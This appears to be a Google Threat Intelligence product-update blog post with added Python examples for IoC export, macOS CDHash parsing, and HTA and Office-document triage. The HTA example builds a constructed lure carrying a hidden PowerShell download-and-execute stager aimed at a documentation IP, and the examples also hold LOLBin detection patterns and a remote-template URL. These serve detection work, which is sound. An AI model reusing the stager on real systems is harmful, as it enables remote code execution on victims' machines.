Author:
Tim Gallo, Google Cloud, Head of Customer Engineering
Detection Highlights
Our Google Threat Intelligence Group and FLARE teams are always working to update YARA rules to help customers stay ahead of emerging threats. This week, we've rolled out rules in the Google Threat Intelligence platform for three newly tracked malware families. We focus our updates on the threats we see most often in Mandiant engagements, Google Security Operations’ environments, and trending searches.
Whenever our research uncovers a new malware family, we quickly build and deploy the necessary detection signatures.
Here are a few recent examples:
- SALATSTEALER: a Go-based crypto stealer that targets Windows browsers, cryptocurrency wallets, and Telegram clients (specifically Telegram Desktop and Kotatogram). It can also hijack webcams and microphones and stream the captured data directly to a C2 server.
- SCARLETSMASHER: a downloader that retrieves C# .NET source code, compiles it on the host, and executes the result. See its curated YARA detection rule.
- LAGUNARAT: a .NET-based Remote Access Trojan (RAT) backdoor that executes PowerShell commands and manipulates files on the host while communicating with its C2. See its curated YARA detection rule.
Beyond new threats, we're also keeping rules for established malware like VIDAR, EMPIRE, and EVILPUFFIN fresh. These updates help ensure you have the best coverage against evolving campaigns.
You can check out the latest malware profiles in our knowledge base or browse the full list of curated YARA rules.
Better Tools for Threat Profiles
Bulk IoC Downloads. Threat Profiles help you cut through the noise by highlighting the actors and campaigns most relevant to your specific risks. By tailoring these views, your team can focus on the threats that actually matter to your organization.
To make it easier to turn these insights into action, you can now bulk-export Indicators of Compromise (IoCs) from your profiles. We support JSON, CSV, and STIX formats, and you can choose whether to include full metadata.
If you want to automate this, we've added two new API endpoints:
- GET /threat_profiles/{id}/download: exports a package containing all actionable IoCs linked to a specific Threat Profile.
- GET /threat_profiles/{id}/download_url: returns a download URL for export packages larger than 32MB, which are too large for the download endpoint to return directly.
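As an added example (not Google's own client code), here is how a script could drive those two endpoints: request the direct download first, and fall back to the download URL when the package is over the limit. The v3 base URL and the x-apikey header are the documented API conventions; the query parameter names (format, include_metadata), the HTTP status the direct endpoint returns for an oversized package (413 here), the shape of the download_url response, the profile ID tp-123 and the storage host are assumptions for illustration, and the transport is a constructed fake so the script runs offline.

```python
"""Bulk-export the IoCs of a Threat Profile: try GET .../download first and fall
back to GET .../download_url for packages over the 32MB direct limit.  Added
example, not Google's client.  Documented conventions used: the v3 base URL and
the x-apikey header.  ASSUMED for illustration: the query parameter names, the
413 status for an oversized package, and the download_url response shape."""
import json
import urllib.error
import urllib.request

API_BASE = "https://www.virustotal.com/api/v3"
FORMATS = ("json", "csv", "stix")


def urllib_get(url, headers):
    """Real transport: (status, body), never raising on an HTTP error status."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=120) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def export_threat_profile_iocs(profile_id, api_key, fmt="json", include_metadata=False,
                               http_get=urllib_get):
    """Return the export package bytes for one Threat Profile."""
    if fmt not in FORMATS:
        raise ValueError("format must be one of %s" % ", ".join(FORMATS))
    headers = {"x-apikey": api_key}
    query = "?format=%s&include_metadata=%s" % (fmt, "true" if include_metadata else "false")  # ASSUMED names
    base = f"{API_BASE}/threat_profiles/{profile_id}"
    status, body = http_get(base + "/download" + query, headers)
    if status == 200:
        return body
    if status != 413:  # ASSUMED: 413 is how the direct endpoint reports a package over 32MB
        raise RuntimeError(f"download failed: HTTP {status}")
    status, body = http_get(base + "/download_url" + query, headers)
    if status != 200:
        raise RuntimeError(f"download_url failed: HTTP {status}")
    signed_url = json.loads(body)["data"]  # ASSUMED shape: {"data": "<pre-signed URL>"}
    # The pre-signed URL points at a storage host, not the API: never forward the API key to it.
    status, body = http_get(signed_url, {})
    if status != 200:
        raise RuntimeError(f"package fetch failed: HTTP {status}")
    return body


class FakeTransport:
    """CONSTRUCTED stand-in for the API so the example runs offline; records every call."""
    def __init__(self, package, oversized=False):
        self.package, self.oversized, self.calls = package, oversized, []

    def __call__(self, url, headers):
        self.calls.append((url, dict(headers)))
        path = url.split("?", 1)[0]
        if path.startswith(API_BASE):
            if headers.get("x-apikey") != "test-key":
                return 401, b'{"error": "unauthorized"}'
            if path.endswith("/download_url"):
                return 200, b'{"data": "https://storage.example/pkg?sig=abc"}'
            if path.endswith("/download"):
                return (413, b"") if self.oversized else (200, self.package)
        if path.startswith("https://storage.example/"):
            # A leaked API key on the storage request is treated as a failure by this fake.
            return (403, b"") if "x-apikey" in headers else (200, self.package)
        return 404, b""


if __name__ == "__main__":
    big = FakeTransport(b"...stix bundle...", oversized=True)
    print(export_threat_profile_iocs("tp-123", "test-key", fmt="stix", http_get=big))
    for url, hdrs in big.calls:
        print(url, "with key" if "x-apikey" in hdrs else "without key")
```

The detail worth keeping from the fallback path is that the download URL points at a storage host rather than the API, so the API key must not be sent with that request; the fake transport refuses the fetch if it sees the key, which is the behaviour a real client should be tested against.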

Smart macOS File Reports
New self-signed Tags and CDHash Extraction. Our updated codesign parser makes it much easier to check if a digital signature is trustworthy. By showing details like certificate chains and validity directly in the file report, your team can quickly spot spoofed signatures without needing to dive into the code manually.
Key Capabilities:
- New self-signed Tag: the codesign report now explicitly flags macOS binaries signed with self-issued certificates. It joins the existing signature status indicators, such as invalid-signature and revoked-cert.
- CDHash Extraction: the parser now extracts and displays the Code Directory Hash (CDHash), the 20-byte digest of the signature's CodeDirectory (SHA-1, or SHA-256 truncated to 20 bytes) that Apple's operating systems use to identify a code-signed binary or bundle and verify its integrity.
Take a look at this search example:
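To see what the parser is working with, here is an added example (not Google's parser) that decodes an embedded code-signature SuperBlob, reads the CodeDirectory, computes the CDHash and re-checks the page hashes. The sample signature is constructed inside the block (the identifier com.example.sample and team ID ABCDE12345 are made up) and is ad-hoc, so it carries no CMS blob; on a real Mach-O you would read the bytes that LC_CODE_SIGNATURE points at and, for a certificate-backed signature, go on to parse the CMS blob in slot 0x10000, which is where the self-signed determination is made.

```python
"""Parse an embedded macOS code signature (the SuperBlob that LC_CODE_SIGNATURE
points at), decode its CodeDirectory and compute the CDHash the way codesign(1)
reports it.  Added example, not Google Threat Intelligence's parser: the signature
is CONSTRUCTED by build_sample_superblob(); on a real Mach-O you would feed in the
bytes at the LC_CODE_SIGNATURE dataoff/datasize instead."""
import hashlib
import struct

CSMAGIC_EMBEDDED_SIGNATURE = 0xFADE0CC0  # SuperBlob wrapping every signature blob
CSMAGIC_CODEDIRECTORY = 0xFADE0C02       # CodeDirectory blob magic
CSSLOT_CODEDIRECTORY = 0
CSSLOT_SIGNATURESLOT = 0x10000           # CMS blob that carries the certificate chain
CS_ADHOC = 0x2                           # CodeDirectory flag: ad-hoc, no CMS signature
HASH_ALGOS = {1: "sha1", 2: "sha256", 3: "sha256"}  # hashType 3 = SHA-256 cut to 20 bytes
CD_HEADER = ">IIIIIIIIIBBBBIII"          # header fields through teamOffset (v0x20200)


def parse_superblob(data):
    """Return {slot: blob bytes} for every blob the SuperBlob index points at."""
    magic, length, count = struct.unpack_from(">III", data, 0)
    if magic != CSMAGIC_EMBEDDED_SIGNATURE or length > len(data):
        raise ValueError("not an embedded code-signature SuperBlob")
    blobs = {}
    for i in range(count):
        slot, offset = struct.unpack_from(">II", data, 12 + 8 * i)
        _blob_magic, blob_len = struct.unpack_from(">II", data, offset)
        if offset + blob_len > length:
            raise ValueError("blob for slot %#x runs past the SuperBlob" % slot)
        blobs[slot] = data[offset:offset + blob_len]
    return blobs


def _cstring(buf, offset):
    return buf[offset:buf.index(b"\0", offset)].decode()


def parse_code_directory(cd):
    """Decode the CodeDirectory: identity, flags, page hashes and the CDHash."""
    (magic, length, version, flags, hash_off, ident_off, _n_special, n_code,
     code_limit, hash_size, hash_type, _platform, page_shift, _spare2,
     _scatter_off, team_off) = struct.unpack_from(CD_HEADER, cd, 0)
    if magic != CSMAGIC_CODEDIRECTORY or length != len(cd):
        raise ValueError("malformed CodeDirectory")
    if hash_type not in HASH_ALGOS:
        raise ValueError("unsupported hashType %d" % hash_type)
    algo = HASH_ALGOS[hash_type]
    return {
        "identifier": _cstring(cd, ident_off),
        "team_id": _cstring(cd, team_off) if version >= 0x20200 and team_off else None,
        "adhoc": bool(flags & CS_ADHOC),
        "hash_algo": algo,
        "hash_size": hash_size,
        "page_size": 1 << page_shift if page_shift else None,  # 0 = one slot covers all code
        "code_limit": code_limit,
        "code_hashes": [cd[hash_off + i * hash_size:hash_off + (i + 1) * hash_size]
                        for i in range(n_code)],
        # CDHash = digest of the whole CodeDirectory blob with its own hashType,
        # truncated to 20 bytes; this is what codesign -dvvv prints as CDHash=.
        "cdhash": hashlib.new(algo, cd).digest()[:20].hex(),
    }


def describe_signature(superblob):
    """Triage summary: who signed it (if anyone) and the CDHash to pivot on."""
    blobs = parse_superblob(superblob)
    info = parse_code_directory(blobs[CSSLOT_CODEDIRECTORY])
    # Ad-hoc signatures carry no CMS blob, so there is no certificate chain to evaluate.
    info["has_cms_signature"] = len(blobs.get(CSSLOT_SIGNATURESLOT, b"")) > 8
    return info


def verify_code_pages(superblob, code):
    """Re-hash the signed code pages and compare them with the CodeDirectory slots."""
    info = describe_signature(superblob)
    page = info["page_size"] or info["code_limit"]
    body = code[:info["code_limit"]]
    for i, expected in enumerate(info["code_hashes"]):
        digest = hashlib.new(info["hash_algo"], body[i * page:(i + 1) * page]).digest()
        if digest[:info["hash_size"]] != expected:
            return False
    return True


def build_sample_superblob(code, hash_type=2, ident=b"com.example.sample", team=b"ABCDE12345"):
    """CONSTRUCTED vector: ad-hoc CodeDirectory over `code`, 4 KiB pages, no CMS blob."""
    algo, page_shift = HASH_ALGOS[hash_type], 12
    hash_size = 20 if hash_type in (1, 3) else 32
    pages = [code[i:i + (1 << page_shift)] for i in range(0, len(code), 1 << page_shift)]
    hashes = b"".join(hashlib.new(algo, p).digest()[:hash_size] for p in pages)
    ident_off = struct.calcsize(CD_HEADER)
    team_off = ident_off + len(ident) + 1
    hash_off = team_off + len(team) + 1
    cd = struct.pack(CD_HEADER, CSMAGIC_CODEDIRECTORY, hash_off + len(hashes), 0x20200,
                     CS_ADHOC, hash_off, ident_off, 0, len(pages), len(code), hash_size,
                     hash_type, 0, page_shift, 0, 0, team_off)
    cd += ident + b"\0" + team + b"\0" + hashes
    cd_offset = 12 + 8  # SuperBlob header plus one index entry
    return (struct.pack(">III", CSMAGIC_EMBEDDED_SIGNATURE, cd_offset + len(cd), 1)
            + struct.pack(">II", CSSLOT_CODEDIRECTORY, cd_offset) + cd)


SAMPLE_CODE = b"constructed Mach-O __TEXT bytes\0" * 200  # 6400 bytes: two pages
SAMPLE_SUPERBLOB = build_sample_superblob(SAMPLE_CODE)

if __name__ == "__main__":
    info = describe_signature(SAMPLE_SUPERBLOB)
    print(info["identifier"], info["team_id"], "adhoc=%s cms=%s" % (info["adhoc"], info["has_cms_signature"]))
    print("cdhash:", info["cdhash"], "pages verify:", verify_code_pages(SAMPLE_SUPERBLOB, SAMPLE_CODE))
```

The cdhash this computes should match the CDHash= line that codesign -dvvv prints for the same binary. It is the right value to pivot on when hunting re-signed samples: it changes whenever the code, identifier or team ID changes, regardless of which certificate did the signing, whereas the CMS blob changes on every re-sign.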

More Flexibility for Collections
Track your own Actors, Malware, and Campaigns. We use "threat objects" to help organize global intelligence into a clear story. These collections link forensic indicators to a broader narrative, giving your investigations more context.
We've expanded this framework so you can create your own custom entities directly on the platform. Any object you create is private by default, but you can easily share it with your team whenever you're ready.
By creating a private object, you can now combine your internal data with Google's global view, helping you map out unique attacker profiles. It standardizes how you document threats and speeds up attribution by linking new evidence to groups you've already defined.

New Third-Party Integrations
Integrations are key to making threat intelligence useful. They help you turn raw data into action, break down data silos, and reduce your mean time to respond (MTTR).
Our latest integrations include:
You can see the full list of our technology integrations here.
What's New with Agentic
Better Malware Analysis with a Persistent File System.
Agentic threat intelligence capabilities in Google Threat Intelligence are designed to automate your hunting and investigation workflows. They use specialized agents with direct access to Google Threat Intelligence data, so you don't have to pivot between tools manually, and they translate raw data into concise summaries, changing how you interact with complex threats.
We're introducing a new persistent file system for the platform. This gives the agent an isolated environment to explore directories and read configs autonomously throughout a session. By carrying evidence forward, the agent can now perform much deeper dives into malicious behavior over an extended timeline.

HTA Analysis and De-obfuscation in Agentic.
Agentic threat intelligence delivers support for analyzing and de-obfuscating HTA files—a common way for attackers to get initial access. The agent can now pull apart complex HTA files while filtering out noise, helping you see the critical indicators faster.
Key Capabilities:
- Advanced Evasion Detection: the agent immediately spots malware that tries to evade detection by masquerading as legitimate software (e.g., fraudulent updates).
- Deep Code De-obfuscation: it natively decodes complex, custom encoding and obfuscation schemes (such as layered XOR) to reveal the underlying malicious script.
- Full Attack Chain Visibility: it automatically extracts hidden secondary payloads and identifies Command & Control (C2) infrastructure, giving analysts a comprehensive picture of the threat vector.
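An added example (not the agent's code) of the peel-and-extract workflow those bullets describe, written as a small Python triage script: it pulls the script blocks out of an HTA, rewrites fromCharCode/unescape/Chr() constructs, brute-forces single-byte XOR over hex-packed string literals, repeats until nothing changes, then extracts URLs, LOLBin names and ActiveX ProgIDs and checks the HTA:APPLICATION element for a hidden window and the title for an update lure. The sample HTA is constructed in the block (203.0.113.10 is a documentation address and the stager is a generic PowerShell download-and-execute one-liner); real samples use many other tricks, so treat the rules as a starting point rather than a complete de-obfuscator.

```python
"""Peel common HTA obfuscation layers and extract the indicators underneath,
ending in a BENIGN / SUSPICIOUS / MALICIOUS verdict.  Added example, not Google
Threat Intelligence's agent; the HTA is CONSTRUCTED by build_sample_hta() and the
decoders are generic heuristics, not a complete de-obfuscator."""
import re
import urllib.parse

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)
HEX_LIT_RE = re.compile(r"""["']((?:[0-9a-fA-F]{2}){12,})["']""")        # hex-packed string
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']((?:%[0-9a-fA-F]{2})+)["']\s*\)""")
CHR_CHAIN_RE = re.compile(r"(?:Chr\(\d+\)\s*&\s*)+Chr\(\d+\)")             # VBScript Chr(..)&Chr(..)
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-?=&%]*)?")
LOLBIN_RE = re.compile(r"\b(powershell|mshta|cmd\.exe|rundll32|regsvr32|certutil|bitsadmin|msiexec)\b", re.I)
ACTIVEX_RE = re.compile(r"""ActiveXObject\(\s*["']([^"']+)["']""")
HIDDEN_RE = re.compile(r"""<HTA:APPLICATION[^>]*(windowstate\s*=\s*["']?minimize|showintaskbar\s*=\s*["']?no)""", re.I)
LURE_RE = re.compile(r"update|upgrade|install|security alert|license", re.I)
KEYWORDS = ("http", "powershell", "WScript", "ActiveXObject", "eval(", "Run(", "cmd", "Shell")


def xor_bruteforce(raw):
    """Try every single-byte key; keep the printable decoding that looks most like script."""
    best, best_score = None, 0
    for key in range(256):
        cand = bytes(b ^ key for b in raw)
        if any(c > 126 or (c < 32 and c not in (9, 10, 13)) for c in cand):
            continue  # non-printable output: wrong key
        text = cand.decode("ascii")
        letters = sum(ch.isalpha() or ch == " " for ch in text)
        score = letters + 100 * sum(text.count(k) for k in KEYWORDS)
        if score > best_score and (score >= 100 or letters / len(text) >= 0.7):
            best, best_score = text, score
    return best


def decode_layer(script):
    """Rewrite one layer of encoding in place; None means nothing more to peel."""
    out = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), script)
    out = UNESCAPE_RE.sub(lambda m: urllib.parse.unquote(m.group(1)), out)
    out = CHR_CHAIN_RE.sub(
        lambda m: "".join(chr(int(n)) for n in re.findall(r"Chr\((\d+)\)", m.group(0))), out)
    for m in HEX_LIT_RE.finditer(script):
        decoded = xor_bruteforce(bytes.fromhex(m.group(1)))
        if decoded:
            out = out.replace(m.group(0), decoded)
    return out if out != script else None


def analyze_hta(hta_text):
    """Return a triage record: layers peeled, indicators, evasion signs and a verdict."""
    current, layers = "\n".join(SCRIPT_RE.findall(hta_text)), 0
    while layers < 8:
        nxt = decode_layer(current)
        if nxt is None:
            break
        current, layers = nxt, layers + 1
    title = TITLE_RE.search(hta_text)
    report = {
        "layers_peeled": layers,
        "urls": sorted(set(URL_RE.findall(current))),
        "lolbins": sorted({m.lower() for m in LOLBIN_RE.findall(current)}),
        "activex": sorted(set(ACTIVEX_RE.findall(current))),
        "hidden_window": bool(HIDDEN_RE.search(hta_text)),   # minimized / no taskbar entry
        "update_lure": bool(title and LURE_RE.search(title.group(1))),
        "decoded_script": current,
    }
    if report["urls"] and report["lolbins"]:
        report["verdict"] = "MALICIOUS"      # fetches something and hands it to a LOLBin
    elif layers or report["activex"] or report["hidden_window"]:
        report["verdict"] = "SUSPICIOUS"
    else:
        report["verdict"] = "BENIGN"
    return report


def build_sample_hta(key=0x5A):
    """CONSTRUCTED lure: hidden HTA window, XOR+hex-packed JScript, PowerShell stager."""
    payload = ('new ActiveXObject("WScript.Shell").Run("powershell -nop -w hidden -c '
               "IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.10/update.ps1'))\", 0, false);")
    packed = bytes(b ^ key for b in payload.encode()).hex()
    return f"""<html><head><title>Browser Update Required</title>
<HTA:APPLICATION id="upd" windowstate="minimize" showintaskbar="no"/>
<script language="JScript">
var k = {key}, h = "{packed}", s = "";
for (var i = 0; i < h.length; i += 2) {{ s += String.fromCharCode(parseInt(h.substr(i, 2), 16) ^ k); }}
eval(s); window.close();
</script></head><body>Your browser is out of date. Installing the update...</body></html>"""


SAMPLE_HTA = build_sample_hta()

if __name__ == "__main__":
    result = analyze_hta(SAMPLE_HTA)
    for field in ("verdict", "layers_peeled", "urls", "lolbins", "activex", "hidden_window", "update_lure"):
        print(f"{field}: {result[field]}")
```

The XOR brute force scores candidates rather than stopping at the first printable one: flipping only the low bits of a key keeps printable ASCII printable, so a naive "first readable output" rule picks a wrong key roughly a third of the time.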

Advanced Office Document Analysis in Agentic.
We've also improved how we handle Office documents. The agent now uses a structured approach to spot malicious macros and exploits in Word, Excel, and RTF files. It runs specialized tools and expert rules to give you a clear verdict: BENIGN, SUSPICIOUS, or MALICIOUS.
Key Capabilities:
- Macro Heuristics & De-obfuscation: automatically detects and analyzes suspicious VBA and Excel 4.0 macros, peeling back obfuscation layers to reveal hidden payloads.
- Exploit Detection: identifies known exploit patterns and initial access techniques, such as Equation Editor overflows and malicious remote template injections.
- Structured Reporting: generates a clean, analyst-ready report complete with a clear logical reasoning chain and raw supporting evidence.

By automating macro de-obfuscation and exploit detection, agentic threat intelligence provides security analysts with the clarity needed to confront complex document-based threats. This structured approach to reporting transforms raw technical findings into actionable insights, empowering teams to identify malicious payloads with significantly greater speed and accuracy.
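An added example (not the agent's code) of that structured approach in Python: an OOXML walk that flags VBA and Excel 4.0 macro containers, external attachedTemplate relationships (remote template injection) and Equation Editor OLE objects, an RTF scan for the same OLE control words, and a severity fold that yields the BENIGN/SUSPICIOUS/MALICIOUS verdict together with a reasoning chain. The sample documents are constructed in the block (203.0.113.10 is a documentation address); VBA source extraction (MS-OVBA decompression) is out of scope here, so macros are reported by presence rather than content, and legacy binary .doc/.xls files are not handled.

```python
"""Structured triage of Office documents: macro containers, remote template
injection and Equation Editor OLE objects, folded into a BENIGN / SUSPICIOUS /
MALICIOUS verdict with a reasoning chain.  Added example, not Google Threat
Intelligence's tooling; handles OOXML (docx/xlsx and macro-enabled variants) and
RTF, not legacy binary .doc/.xls.  Samples are CONSTRUCTED below."""
import io
import re
import zipfile

EXTERNAL_REL_RE = re.compile(r'<Relationship\b[^>]*\bTargetMode="External"[^>]*/?>', re.I)
PROGID_RE = re.compile(r'\bProgID="([^"]+)"', re.I)
RTF_OBJCLASS_RE = re.compile(r"\\objclass\s*([A-Za-z0-9._]+)", re.I)
RELS_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
SEV = {"BENIGN": 0, "SUSPICIOUS": 1, "MALICIOUS": 2}


def _attr(tag, name):
    m = re.search(r'\b%s="([^"]*)"' % name, tag)
    return m.group(1) if m else ""


def scan_ooxml(blob):
    """Walk the OOXML package; return (severity, kind, detail) findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        for name in z.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                findings.append(("SUSPICIOUS", "vba_macro", "VBA project stored at " + name))
            elif lower.startswith("xl/macrosheets/"):
                findings.append(("SUSPICIOUS", "xlm_macro", "Excel 4.0 macro sheet " + name))
            if lower.endswith(".rels"):
                for tag in EXTERNAL_REL_RE.findall(z.read(name).decode("utf-8", "replace")):
                    rel_type = _attr(tag, "Type").rsplit("/", 1)[-1]
                    target = _attr(tag, "Target")
                    if rel_type == "attachedTemplate":
                        # Template fetched from the internet on open = remote template injection.
                        sev = "MALICIOUS" if target.lower().startswith(("http://", "https://")) else "SUSPICIOUS"
                        findings.append((sev, "remote_template", f"{name}: attachedTemplate -> {target}"))
                    elif rel_type in ("oleObject", "frame"):
                        findings.append(("SUSPICIOUS", "external_object", f"{name}: {rel_type} -> {target}"))
            elif lower.endswith(".xml"):
                for progid in PROGID_RE.findall(z.read(name).decode("utf-8", "replace")):
                    if progid.lower().startswith("equation"):
                        findings.append(("SUSPICIOUS", "equation_editor", f"{name}: OLE ProgID {progid}"))
    return findings


def scan_rtf(blob):
    """RTF needs no unpacking: read the OLE object control words directly."""
    text = blob.decode("latin-1")
    findings = [("SUSPICIOUS", "equation_editor", "RTF object class " + cls)
                for cls in RTF_OBJCLASS_RE.findall(text) if cls.lower().startswith("equation")]
    if re.search(r"\\objupdate\b", text):
        findings.append(("SUSPICIOUS", "ole_autoupdate", r"\objupdate forces the OLE object to load on open"))
    elif re.search(r"\\objdata\b", text) and not findings:
        findings.append(("SUSPICIOUS", "embedded_ole", r"embedded OLE object (\objdata)"))
    return findings


def analyze_document(blob):
    """Dispatch on format, apply chain rules, and fold the findings into a verdict."""
    if blob.startswith(b"{\\rtf"):
        findings = scan_rtf(blob)
    elif blob.startswith(b"PK\x03\x04"):
        findings = scan_ooxml(blob)
    else:
        raise ValueError("not an OOXML or RTF document")
    kinds = {kind for _, kind, _ in findings}
    if {"equation_editor", "ole_autoupdate"} <= kinds:
        findings.append(("MALICIOUS", "chain", "Equation Editor object forced to load on open"))
    verdict = max((sev for sev, _, _ in findings), key=SEV.get, default="BENIGN")
    return {"verdict": verdict, "reasoning": [f"[{s}] {k}: {d}" for s, k, d in findings]}


def build_sample_docx(template_url=None, with_vba=False):
    """CONSTRUCTED minimal .docx, optionally with a remote template relationship or a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document><w:body><w:p><w:t>Invoice</w:t></w:p></w:body></w:document>")
        rels = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        if template_url:
            rels += (f'<Relationship Id="rId1" Type="{RELS_NS}attachedTemplate" '
                     f'Target="{template_url}" TargetMode="External"/>')
        z.writestr("word/_rels/settings.xml.rels", rels + "</Relationships>")
        z.writestr("word/settings.xml", "<w:settings/>")
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 24)  # OLE2 header only
    return buf.getvalue()


SAMPLE_RTF = (b"{\\rtf1\\ansi\\deff0{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
              b"{\\*\\objdata 0105000002000000}}\\par}")

if __name__ == "__main__":
    for label, doc in [("clean", build_sample_docx()),
                       ("template", build_sample_docx("http://203.0.113.10/t.dotm")), ("rtf", SAMPLE_RTF)]:
        print(label, analyze_document(doc))
```

The severity split is deliberate: an Equation Editor object or a VBA project on its own still turns up in legitimate legacy documents, so each alone is SUSPICIOUS, whereas a template pulled from an internet URL on open, or an Equation Editor object combined with \objupdate (which forces it to load without user interaction), has no benign explanation worth waiting for.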
In conclusion, the May 2026 updates represent a significant leap forward for the Google Threat Intelligence platform. From the introduction of new curated YARA rules and streamlined bulk IoC exports to enhanced macOS CDHash extraction and the flexibility of custom collections, these tools provide deeper visibility into the modern threat landscape. Combined with an expanded ecosystem of third-party integrations and the powerful new agentic AI capabilities—including a persistent file system and sophisticated document de-obfuscation—security teams are now better equipped than ever to contextualize emerging threats and drastically accelerate their response times.
